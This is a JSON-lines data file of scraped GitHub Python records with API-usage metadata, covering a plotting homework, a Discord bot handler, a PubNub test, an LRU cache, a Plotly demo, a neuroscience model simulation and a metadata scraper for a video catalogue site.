{"api_name": "luna.utils.message.Message", "line_number": 366, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 374, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 383, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 390, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 399, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 400, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 401, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 407, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 409, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 417, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 426, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 433, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 442, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 443, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 444, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 450, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 452, "usage_type": "call"}, {"api_name": "hostlist.expand_hostlist", "line_number": 463, "usage_type": "call"}, {"api_name": "hostlist.BadHostlist", "line_number": 465, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 505, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 541, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 542, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 543, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 548, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 557, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 558, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 566, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 568, "usage_type": "call"}, {"api_name": "luna.utils.constant.filter_columns", "line_number": 579, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 586, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 588, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 590, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 592, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 594, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 596, "usage_type": "call"}, {"api_name": "luna.utils.constant.filter_columns", "line_number": 632, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 687, "usage_type": "call"}, {"api_name": "binascii.Error", "line_number": 688, "usage_type": "attribute"}, {"api_name": "base64.b64decode", "line_number": 700, "usage_type": "call"}, {"api_name": "binascii.Error", "line_number": 701, "usage_type": "attribute"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 748, "usage_type": "name"}, {"api_name": "nested_lookup.nested_alter", "line_number": 749, "usage_type": "call"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 768, "usage_type": "name"}, {"api_name": "nested_lookup.nested_alter", "line_number": 769, "usage_type": "call"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 798, "usage_type": "name"}, {"api_name": "nested_lookup.nested_alter", "line_number": 799, "usage_type": "call"}, {"api_name": "nested_lookup.nested_alter", "line_number": 810, "usage_type": "call"}, {"api_name": "luna.utils.constant.filter_columns", "line_number": 824, "usage_type": "call"}, {"api_name": "luna.utils.constant.sortby", "line_number": 860, "usage_type": "call"}, {"api_name": "luna.utils.constant.sortby", "line_number": 901, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 947, "usage_type": "call"}, {"api_name": "luna.utils.constant.sortby", "line_number": 980, "usage_type": "call"}]} +{"seq_id": "6230116645", "text": "#written using python2.7 (renamed .py to .txt)\n\n\n#created 2 plots (1 semilog,1 linear)\n#I decreased step size and increased time to get a longer plot\n\nimport matplotlib.pyplot as plt\n\ndef integrate(r,k):\n\tt=0 \n\tdx=.001 #small perturbation\n\tx=0.001 #initial x\n\tdt=.01\n\twhile t<12:\n\t\tdxdt=r*x*(1-x/k)/(k*r) #function\n\t\tx+= dxdt*dt/k #incrimenting x values\n\t\tt+=dt*r #incrimenting time values\n\t\t#plt.plot(t,x,'--bo')\n\t\tplt.ylabel(\"X(t)\")\n\t\tplt.xlabel(\"Time\")\n\t\tplt.semilogy(t,x,'--bo')\n\t#print(t,x)\nintegrate(4,30) ##r affects rise rate, k leads to asymptote \nintegrate(2,2)\nintegrate(1,4) \nintegrate(15,1)\nintegrate(20,5)\nplt.show()\n\n\n", "repo_name": "bpc5604/chaos", "sub_path": "HW03/hw03.py", "file_name": "hw03.py", "file_ext": "py", "file_size_in_byte": 654, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogy", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "38610606928", "text": "import time, datetime\nimport sched\n\nimport discord\nfrom discord.ext import commands, tasks\n\nimport config\nimport embeds\n\npop_message: discord.message\n\n# keeping track of who's in a pop\npopped_members = []\nwaiting_members = []\n\n# ending timestamp\nend_time = \"\"\n\n\n# since these buttons only apply inside this handler they can be here\nclass ReadyButton(discord.ui.View):\n def __init__(self, head_text):\n super().__init__(timeout=None)\n self.header = head_text\n\n @discord.ui.button(label=\"Ready!\", style=discord.ButtonStyle.primary)\n async def ready_button(self, interaction: discord.Interaction, button: discord.ui.Button):\n await interaction.response.defer()\n accept_player(interaction.user)\n await interaction.message.edit(content=self.header,\n embed=embeds.get_waiting_embed_unix(waiting_members=waiting_members,\n end_time=end_time))\n\n\n@tasks.loop(seconds=1, count=config.queue_timer)\nasync def queue_timer():\n if len(waiting_members) == 0:\n queue_timer.stop()\n\n\n@queue_timer.after_loop\nasync def after_timer():\n return\n\n\n# remove a player from the list of un-accepted players when they ready\ndef accept_player(player):\n global waiting_members\n\n if player in waiting_members:\n waiting_members.remove(player)\n\n\n# seeing who in a pop is readying\nasync def afk_check_pop(channel, popped_players, new_players):\n global popped_members\n global waiting_members\n global pop_message\n global end_time\n\n # set up queue timer\n remaining_time = config.queue_timer\n\n end_time = f''\n\n scheduler = sched.scheduler(time.time, time.sleep)\n\n # mem issues w/ refs requires you to make copy here\n popped_members = popped_players.copy()\n waiting_members = new_players.copy()\n\n print(popped_members)\n\n # create a header listing match members so you can see who's actually in the match\n header = \"Match Ready For: \\n\"\n\n for member in popped_players:\n id = member.id\n header += f'<@{id}> '\n\n # this gets updated each loop cycle\n temp = header + \"\\nWaiting On: \\n \"\n\n for member in waiting_members:\n id = member.id\n temp += f'<@{id}> '\n\n temp += \"\\nTime Remaining: \" + str(remaining_time)\n\n # add message and reaction\n # copy needed to fix mem issues with async\n pop_message_temp = await channel.send(content=header, view=ReadyButton(header),\n embed=embeds.get_waiting_embed_unix(waiting_members=waiting_members,\n end_time=end_time))\n pop_message = pop_message_temp\n\n # start queue countdown\n await queue_timer.start()\n\n # remove the expired pop message\n await pop_message_temp.delete()\n\n return\n\n\n# clear popped members from memory\ndef clear_pop():\n global popped_members\n\n popped_members = []\n", "repo_name": "Acoliver102/Tonguelash", "sub_path": "pop_handler.py", "file_name": "pop_handler.py", "file_ext": "py", "file_size_in_byte": 3033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "discord.message", "line_number": 10, "usage_type": "attribute"}, {"api_name": "discord.ui", "line_number": 21, "usage_type": "attribute"}, {"api_name": "discord.Interaction", "line_number": 27, "usage_type": "attribute"}, {"api_name": "discord.ui", "line_number": 27, "usage_type": "attribute"}, {"api_name": "embeds.get_waiting_embed_unix", "line_number": 31, "usage_type": "call"}, {"api_name": "discord.ui.button", "line_number": 26, "usage_type": "call"}, {"api_name": "discord.ui", "line_number": 26, "usage_type": "attribute"}, {"api_name": "discord.ButtonStyle", "line_number": 26, "usage_type": "attribute"}, {"api_name": "discord.ext.tasks.loop", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.ext.tasks", "line_number": 35, "usage_type": "name"}, {"api_name": "config.queue_timer", "line_number": 35, "usage_type": "attribute"}, {"api_name": "config.queue_timer", "line_number": 62, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 64, "usage_type": "call"}, {"api_name": "config.queue_timer", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sched.scheduler", "line_number": 66, "usage_type": "call"}, {"api_name": "time.time", "line_number": 66, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 66, "usage_type": "attribute"}, {"api_name": "embeds.get_waiting_embed_unix", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "34180895202", "text": "import unittest\nimport threading\n\nfrom pubnub.pubnub import PubNub\nfrom tests.helper import pnconf\n\n\nclass TestPubNubSuccessHistoryDelete(unittest.TestCase): # pylint: disable=W0612\n def setUp(self):\n self.event = threading.Event()\n\n def callback(self, response, status):\n self.response = response\n self.status = status\n self.event.set()\n\n def assert_success(self):\n self.event.wait()\n if self.status.is_error():\n self.fail(str(self.status.error_data.exception))\n self.event.clear()\n self.response = None\n self.status = None\n\n def test_success(self):\n PubNub(pnconf).delete_messages() \\\n .channel(\"my-ch\") \\\n .start(123) \\\n .end(456) \\\n .pn_async(self.callback)\n\n self.assert_success()\n\n def test_super_call(self):\n PubNub(pnconf).delete_messages() \\\n .channel(\"my-ch- |.* $\") \\\n .start(123) \\\n .end(456) \\\n .pn_async(self.callback)\n\n self.assert_success()\n", "repo_name": "pubnub/python", "sub_path": "tests/integrational/native_threads/test_history_delete.py", "file_name": "test_history_delete.py", "file_ext": "py", "file_size_in_byte": 1063, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 155, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 8, "usage_type": "attribute"}, {"api_name": "threading.Event", "line_number": 10, "usage_type": "call"}, {"api_name": "pubnub.pubnub.PubNub", "line_number": 26, "usage_type": "call"}, {"api_name": "tests.helper.pnconf", "line_number": 26, "usage_type": "argument"}, {"api_name": "pubnub.pubnub.PubNub", "line_number": 35, "usage_type": "call"}, {"api_name": "tests.helper.pnconf", "line_number": 35, "usage_type": "argument"}]} +{"seq_id": "21963434324", "text": "from collections import OrderedDict\nfrom copy import deepcopy\nfrom typing import Any\n\nfrom pims.config import get_settings\n\n\nclass LRUCache:\n def __init__(self, capacity: int):\n self.cache = OrderedDict()\n self.capacity = capacity\n\n def get(self, key: str) -> Any:\n if key not in self.cache:\n return None\n else:\n self.cache.move_to_end(key)\n return self.cache[key]\n\n def put(self, key: str, value: Any) -> None:\n self.cache[key] = value\n self.cache.move_to_end(key)\n if len(self.cache) > self.capacity:\n self.cache.popitem(last=False)\n\n\nclass ImageLRUCache(LRUCache):\n def get(self, key: str) -> Any:\n image = super().get(key)\n if image is None:\n return None\n cloned = deepcopy(image)\n self.cache[key] = cloned\n return cloned\n\n\nIMAGE_CACHE = ImageLRUCache(get_settings().memory_lru_cache_capacity)\n", "repo_name": "Cytomine-ULiege/pims", "sub_path": "pims/cache/memory.py", "file_name": "memory.py", "file_ext": "py", "file_size_in_byte": 949, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.OrderedDict", "line_number": 10, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 20, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 32, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 28, "usage_type": "name"}, {"api_name": "pims.config.get_settings", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "27574655967", "text": "import plotly.express as px\nimport time\n\ndef Parallel_Coordinates_Plot():\n start_time = time.time()\n\n df = px.data.iris()\n fig = px.parallel_coordinates(df, color=\"species_id\", labels={\"species_id\": \"Species\",\n \"sepal_width\": \"Sepal Width\", \"sepal_length\": \"Sepal Length\",\n \"petal_width\": \"Petal Width\", \"petal_length\": \"Petal Length\", },\n color_continuous_scale=px.colors.diverging.Tealrose,\n color_continuous_midpoint=2)\n fig.update_layout(\n title='Parallel Coodinates Plot')\n\n end_time = round(time.time() - start_time, 3)\n print(str(end_time) + ' seconds Graphing data for Parallel_Coordinates_Plot')\n\n fig.show()", "repo_name": "AllenChildress/Python_Plotly_Demo", "sub_path": "Parallel_Coordinates_Plot.py", "file_name": "Parallel_Coordinates_Plot.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 5, "usage_type": "call"}, {"api_name": "plotly.express.data.iris", "line_number": 7, "usage_type": "call"}, {"api_name": "plotly.express.data", "line_number": 7, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 7, "usage_type": "name"}, {"api_name": "plotly.express.parallel_coordinates", "line_number": 8, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 8, "usage_type": "name"}, {"api_name": "plotly.express.colors", "line_number": 11, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 11, "usage_type": "name"}, {"api_name": "time.time", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "38273194895", "text": "\"\"\"\nSimulate model with many parameters.\n\"\"\"\n\nimport os\nimport numpy as np\nfrom jaratoolbox import settings\nimport studyparams\nimport figparams\nimport model_suppression as suppmodel\nreload(suppmodel)\n\nfigName = 'figure_model'\ndataDir = os.path.join(settings.FIGURES_DATA_PATH, figparams.STUDY_NAME, figName)\n\n# -- Simulate model --\nnCells = 101\n\nRANDOMIZED = 1\nnp.random.seed(1)\n\ndef random_in_range(low,high,shape):\n \"\"\"Return equally distributed random numbers in specified range\"\"\"\n width = high-low\n randVec = width*np.random.rand(shape) + low\n return randVec\n\nif RANDOMIZED:\n nSamples = 200\n #rfWidths = {'PV':5, 'SOM':5, 'Thal':5}\n rfWidths = None\n# ampPVvec = random_in_range(-1, -30, nSamples)\n# ampSOMvec = random_in_range(-1, -30, nSamples)\n# stdThalvec = random_in_range(2, 5, nSamples)\n suppIndexVec = np.empty((3,nSamples)) # 3:Control, PV, SOM\n changeAtPeakVec = np.empty((2,nSamples)) # 2:PV-Control, SOM-Control\n changeAtWNVec = np.empty((2,nSamples)) # 2:PV-Control, SOM-Control\n \n oct_range = 6\n\n stdPVoct = 0.8 * (nCells-1)/oct_range\n ampPVvec = random_in_range(-1, -30, nSamples) \n ampSOMvec = random_in_range(-1, -30, nSamples) \n stdSOMvec = random_in_range(1, 2, nSamples)\n stdThalvec = random_in_range(.2, 1, nSamples)\n\n\n for inds in range(nSamples):\n wParams = {'ampPV':ampPVvec[inds], 'stdPV':stdPVoct, #'stdPV':10,\n 'ampSOM':ampSOMvec[inds], 'stdSOM':stdSOMvec[inds] * stdPVoct, #'stdSOM':20, \n 'ampThal':100, 'stdThal':stdThalvec[inds] * stdPVoct} #stdThalvec[inds] \n net = suppmodel.Network(nCells, wParams, rfWidths)\n centerCellOutput, bandwidths, condLabels = net.simulate_inactivation()\n suppIndex = suppmodel.suppression_index(centerCellOutput)\n changeAtPeak, changeAtWN = suppmodel.change_in_response(centerCellOutput)\n suppIndexVec[:,inds] = suppIndex\n changeAtPeakVec[:,inds] = changeAtPeak\n changeAtWNVec[:,inds] = changeAtWN\nelse:\n ampPVvec = np.arange(-2,-44, -4) # -20\n ampSOMvec = np.arange(-2,-44, -4) # -20\n stdThalvec = [5,7,9]#np.arange(3, 15, 2) # 6\n\n suppIndexAll = np.empty((3,len(ampPVvec),len(ampSOMvec),len(stdThalvec))) # 3:Control, PV, SOM\n changeAtPeakAll = np.empty((2,len(ampPVvec),len(ampSOMvec),len(stdThalvec))) # 2:PV-Control, SOM-Control\n changeAtWNAll = np.empty((2,len(ampPVvec),len(ampSOMvec),len(stdThalvec))) # 2:PV-Control, SOM-Control\n\n for indPV,ampPV in enumerate(ampPVvec):\n for indSOM,ampSOM in enumerate(ampSOMvec):\n for indThal,stdThal in enumerate(stdThalvec):\n wParams = {'ampPV':ampPV, 'stdPV':10,\n 'ampSOM':ampSOM, 'stdSOM':30,\n 'ampThal':100, 'stdThal':stdThal}\n net = suppmodel.Network(nCells, wParams)\n centerCellOutput, bandwidths, condLabels = net.simulate_inactivation()\n suppIndex = suppmodel.suppression_index(centerCellOutput)\n changeAtPeak, changeAtWN = suppmodel.change_in_response(centerCellOutput)\n suppIndexAll[:,indPV,indSOM,indThal] = suppIndex\n changeAtPeakAll[:,indPV,indSOM,indThal] = changeAtPeak\n changeAtWNAll[:,indPV,indSOM,indThal] = changeAtWN\n nConds = len(ampPVvec)*len(ampSOMvec)*len(stdThalvec) \n suppIndexVec = suppIndexAll.reshape([3,nConds])\n changeAtPeakVec = changeAtPeakAll.reshape([2,nConds])\n changeAtWNVec = changeAtWNAll.reshape([2,nConds])\n\n \nimport matplotlib.pyplot as plt\n\nplt.clf()\n\nmarkerSize = 3\n\n# -- Plot supp index --\nplt.subplot(2,2,1)\nplt.plot(suppIndexVec[0],suppIndexVec[1],'sb', mfc='none', ms=markerSize)\nplt.plot(suppIndexVec[0],suppIndexVec[2],'or', mfc='none', ms=markerSize)\nxLims = [-0.1,1.1]\nplt.xlim(xLims)\nplt.ylim(xLims)\nplt.plot(xLims,xLims,'--',color='0.5')\nplt.xlabel('Suppression Index (control)')\nplt.ylabel('Suppression Index (inactivation)')\n#plt.axis('square')\n\nplt.subplot(2,2,2)\navgSIchangePV = np.median(suppIndexVec[1]-suppIndexVec[0])\navgSIchangeSOM = np.median(suppIndexVec[2]-suppIndexVec[0])\nplt.bar(1,avgSIchangePV, fc='w', ec='b', lw=2)\nplt.bar(2,avgSIchangeSOM, fc='w', ec='r', lw=2)\n\n\n# -- Plot change in response --\nplt.subplot(2,2,3)\nplt.plot(changeAtPeakVec[0,:],changeAtWNVec[0,:],'sb', mfc='none', ms=markerSize)\nplt.plot(changeAtPeakVec[1,:],changeAtWNVec[1,:],'or', mfc='none', ms=markerSize)\nxLims = [-50,1500]\nplt.xlim(xLims)\nplt.ylim(xLims)\nplt.plot(xLims,xLims,'--',color='0.5')\nplt.xlabel('Change in response to preferred bandwidth')\nplt.ylabel('Change in response to WN')\n#plt.axis('square')\n\nplt.subplot(2,2,2)\n\n\n# -- Save data --\noutputFile = 'response_change_summary.npz'\noutputFullPath = os.path.join(dataDir,outputFile)\n\nnp.savez(outputFullPath, suppIndexVec=suppIndexVec,\n changeAtPeakVec=changeAtPeakVec, changeAtWNVec=changeAtWNVec,\n condLabels=condLabels)\nprint(\"Saved {}\".format(outputFullPath))\n", "repo_name": "sjara/jaratest", "sub_path": "common/2018acsup/generate_model.py", "file_name": "generate_model.py", "file_ext": "py", "file_size_in_byte": 5103, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "jaratoolbox.settings.FIGURES_DATA_PATH", "line_number": 14, "usage_type": "attribute"}, {"api_name": "jaratoolbox.settings", "line_number": 14, "usage_type": "name"}, {"api_name": "figparams.STUDY_NAME", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 37, "usage_type": "call"}, {"api_name": "model_suppression.Network", "line_number": 52, "usage_type": "call"}, {"api_name": "model_suppression.suppression_index", "line_number": 54, "usage_type": "call"}, {"api_name": "model_suppression.change_in_response", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 66, "usage_type": "call"}, {"api_name": "model_suppression.Network", "line_number": 74, "usage_type": "call"}, {"api_name": "model_suppression.suppression_index", "line_number": 76, "usage_type": "call"}, {"api_name": "model_suppression.change_in_response", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.median", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.savez", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "3425393519", "text": "import requests\nimport bs4\n\n\ndef encode(url):\n return \"\".join([chr((ord(rune) + 1) % 128) for rune in url])\n\n\nclass Bus:\n ''' Data source -- BUS\n '''\n base_url = encode(\"gssor9..vvv-i`uatr-bnl.\")\n search_prefix = encode(\"rd`qbg.\")\n http_proxy = \"\"\n\n def __init__(self, http_proxy=\"\"):\n self.http_proxy = http_proxy\n\n def Get(self, designatio):\n result = {}\n\n # URL for searching designatio\n URL = self.base_url + self.search_prefix + designatio\n\n # Using requests\n headers = {\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'cache-control': 'max-age=0',\n 'cookie': 'existmag=all',\n 'referer': 'https://www.javbus.com',\n 'sec-ch-ua': '\"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"',\n 'sec-ch-ua-mobile': '?0',\n 'sec-ch-ua-platform': '\"macOS\"',\n 'sec-fetch-dest': 'document',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-site': 'same-origin',\n 'sec-fetch-user': '?1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',\n }\n response = requests.get(\n URL, proxies={\"http\": self.http_proxy}, headers=headers)\n\n # parse html\n soup = bs4.BeautifulSoup(response.content, features=\"html.parser\")\n\n search_result = soup.select(\".item\")\n if search_result is None or len(search_result) == 0:\n # No result\n raise Exception(\"Not recruited\")\n\n # multiple result - choose the correct one\n matched = []\n for r in search_result:\n id = r.find(\"date\").string\n if id == designatio:\n title = r.find(\"img\").attrs[\"title\"]\n matched.append((id + \" \" + title, r.find(\"a\").attrs[\"href\"]))\n\n idx = 0\n if len(matched) > 1:\n print(\"Multiple Choice:\")\n for i in range(0, len(matched)):\n print(\" [%d] %s\" % (i, matched[i][0]))\n idx = int(input(\"\\nSelect > \"))\n URL = matched[idx][1]\n\n # get info\n response = requests.get(\n URL, proxies={\"http\": self.http_proxy}, headers=headers)\n soup = bs4.BeautifulSoup(response.content, features=\"html.parser\")\n\n # search title\n result[\"title\"] = soup.select_one(\"body > .container > h3\").string\n\n # cover image\n cover_url = soup.select_one(\".bigImage\")[\"href\"]\n if cover_url.startswith('/'):\n cover_url = self.base_url + cover_url\n result[\"cover_url\"] = cover_url\n\n # outline \n try:\n airav_URL = encode(\"gssor9..vvv-`hq`u-vhjh.uhcdn.\") + designatio\n outline_rep = requests.get(\n airav_URL, proxies={\"http\": self.http_proxy}, headers=headers)\n airav_soup = bs4.BeautifulSoup(\n outline_rep.content, features=\"html.parser\")\n result[\"outline\"] = airav_soup.select_one(\".synopsis > p\").string\n except:\n pass\n\n # infomation\n attributes = [e.string for e in soup.select(\".header\")]\n include = {\n \"designatio\": '識別碼:' in attributes,\n \"date\": '發行日期:' in attributes,\n \"length\": '長度:' in attributes,\n \"director\": '導演:' in attributes,\n \"maker\": '製作商:' in attributes,\n \"label\": '發行商:' in attributes,\n \"series\": '系列:' in attributes,\n \"genres\": '類別:' in attributes,\n \"cast\": '演員' in attributes,\n }\n\n # Attributes Extract lambda function\n extract = {\n \"designatio\": lambda soup, i: i.select(\"span\")[1].string,\n \"date\": lambda soup, i: str(i).split(\" \")[1].rstrip(\"

\"),\n \"length\": lambda soup, i: str(i).split(\" \")[1].rstrip(\"

\").strip().rstrip(\"分鐘\"),\n \"director\": lambda soup, i: i.a.string,\n \"maker\": lambda soup, i: i.a.string,\n \"label\": lambda soup, i: i.a.string,\n \"series\": lambda soup, i: i.a.string,\n \"genres\": lambda soup, i: [genre.string for genre in soup.select('a[href^=\"https://www.javbus.com/genre/\"]')][2:],\n \"cast\": lambda soup, i: [actor.a.string for actor in soup.select('span[onmouseout^=\"hoverdiv\"]')],\n }\n\n info = soup.select(\".info > p\")\n idx = 0\n\n for attr in [\"designatio\", \"date\", \"length\", \"director\", \"maker\", \"label\", \"series\", \"genres\", \"cast\"]:\n if include[attr]:\n result[attr] = extract[attr](soup, info[idx])\n idx += 1\n return result\n", "repo_name": "Lqlsoftware/avutil", "sub_path": "avutil/source/bus.py", "file_name": "bus.py", "file_ext": "py", "file_size_in_byte": 5073, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 47, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 71, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 73, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 87, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 89, "usage_type": 